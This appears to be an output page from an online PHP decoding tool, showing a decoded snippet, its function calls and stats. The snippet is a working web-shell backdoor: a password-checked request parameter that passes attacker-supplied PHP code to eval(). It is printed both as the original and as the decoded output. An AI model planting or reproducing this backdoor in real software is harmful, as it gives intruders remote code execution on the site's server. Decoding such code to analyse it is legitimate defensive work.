Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'f27f90dd1689b43134e7c2d8d6403eae') ..

Decoded Output download

<?  if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'f27f90dd1689b43134e7c2d8d6403eae') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } ?>

Did this file decode correctly?

Original Code

if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'f27f90dd1689b43134e7c2d8d6403eae') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); }

Function Calls

md5 1

Variables

None

Stats

MD5 062470aac009639e17644b3d95b00958
Eval Count 0
Decode Time 85 ms